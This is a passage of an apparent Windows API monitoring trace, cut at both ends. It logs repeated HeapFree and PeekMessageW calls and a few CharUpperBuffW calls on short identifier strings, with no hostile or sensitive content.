lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.780] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0160.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.780] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0160.782] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0160.783] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0160.783] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.783] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.783] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.783] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.783] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.784] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.784] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.784] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.785] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0160.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2268 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0160.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0160.787] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.787] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0160.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0160.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.788] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.788] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0160.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0160.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0160.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.788] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.788] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.788] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0160.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0160.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.788] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.789] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0160.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0160.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0160.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.789] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.789] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0160.791] HeapFree (in: 